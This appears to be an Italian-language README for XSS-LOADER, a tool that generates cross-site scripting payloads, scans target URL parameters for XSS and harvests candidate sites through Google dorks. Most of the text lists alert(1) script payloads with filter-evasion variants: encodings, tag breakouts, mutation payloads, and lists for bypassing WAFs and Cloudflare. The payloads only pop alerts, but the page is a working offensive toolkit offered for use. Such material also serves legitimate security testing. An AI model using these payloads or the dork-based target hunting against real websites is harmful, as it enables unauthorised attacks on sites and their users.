
Generatore di Payload Xss ~ Scanner Xss ~ Cercatore di Dork Xss

Strumenti tutto in uno per XSS PAYLOAD GENERATOR -XSS SCANNER-XSS DORK FINDER
Instagram: TMRSWRR

git clone https://github.com/capture0x/XSS-LOADER/
cd XSS-LOADER
pip3 install -r requirements.txt
python3 payloader.py
Imposta il parametro predefinito a :<script>alert(1)</script>
Imposta il parametro predefinito a :<div onpointerover='alert(1)'>MOVE HERE</div
Imposta il parametro predefinito a :``````
Imposta il parametro predefinito a :<body ontouchstart=alert(1)>
Imposta il parametro predefinito a :<svg onload=alert('1')>
Codifica il payload scritto dall'utente
Codifica il payload sul tag selezionato
* | 1. MAIUSCOLO----> <SCRIPT>ALERT(1)</SCRIPT>
* | 2. MAIUSCOLO E MINUSCOLO----> <ScRiPt>aleRt(1)</ScRiPt>
* | 3. CODIFICA URL -----> %3Cscript%3Ealert%281%29%3C%2Fscript%3E
* | 4. CODIFICA ENTITÀ HTML-----> <script>alert(1)</script>
* | 5. PAYLOAD DIVISO -----> <scri</script>pt>>alert(1)</scri</script>pt>>
* | 6. CODIFICA HEX -----> 3c7363726970743e616c6572742831293c2f7363726970743e
* | 7. CODIFICA UTF-16 -----> Codifica il payload in formato utf-16.
* | 8. CODIFICA UTF-32-----> Codifica il payload in formato utf-32.
* | 9. RIMUOVI TAG -----> ";alert('XSS');//
* | 10. CODIFICA UNICODE-----> %uff1cscript%uff1ealert(1)%uff1c/script%uff1e
* | 11. CODIFICA US-ASCII -----> ¼script¾alert(1)¼/script¾
* | 12. CODIFICA BASE64 -----> PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
* | 13. CODIFICA UTF-7 -----> +ADw-script+AD4-alert(1)+ADw-/script+AD4-
* | 14. BYPASS PARENTESI -----> <script>alert`1`</script>
* | 15. CODIFICA UTF-8 -----> %C0%BCscript%C0%BEalert%CA%B91)%C0%BC/script%C0%BE
* | 16. TAG BLOCK BREAKOUT-----> "><script>alert(1)</script>
* | 17. SCRIPT BREAKOUT-----> </script><script>alert(1)</script>
* | 18. PAYLOAD CARICAMENTO FILE-----> "><script>alert(1)</script>.gif
* | 19. BYPASS ALL'INTERNO DEI COMMENTI-----> <!--><script>alert(1)</script>-->
* | 20. PAYLOAD MUTAZIONE-----> <noscript><p title="</noscript><script>alert(1)</script>">
* | 21. IMG MALFORMA-----> <script>alert(1)</script>">
* | 22. BYPASS SPAZIO----->
* | 23. BLOCCO DOWNLEVEL-HIDDEN-----> <!--[if gte IE 4]><script>alert(1)</script><![endif]-->
* | 24. PAYLOAD BYPASS WAF-----> Mostra elenco payload by-pass WAF
* | 25. PAYLOAD BYPASS CLOUDFLARE-----> Mostra elenco payload by-pass Cloudflare
* | 26. PAYLOAD POLYGLOT-----> Mostra elenco payload by-pass Polyglot
* | 27. PAYLOAD ALERT-----> Mostra elenco payload Alert
* | 28. CREA TUTTI I PAYLOAD-----> Mostra crea tutti i payload
* | 29. TORNA AL MENU PRINCIPALE
* | 30. ESCI
Inizialmente dovrai inserire l'URL del target Per favore inserisci l'URL come in questo esempio ==> es. target -----> http://target.com/index.php?name= Selezionato per la scansione dell'elenco payload
I risultati verranno aggiunti in "vulnpayload.txt" dopo la scansione.
Prima inserisci il dork per la ricerca: es.---->inurl:"search.php?q=" I risultati verranno salvati in "dork.txt" dopo la scansione.
Errori Unicode
Errori di modulo
Importante:
Se vuoi utilizzare lo strumento per python3 installato su Windows, scarica il link qui sotto:
Per segnalazioni di bug o miglioramenti, apri un issue qui.
Copyright 2020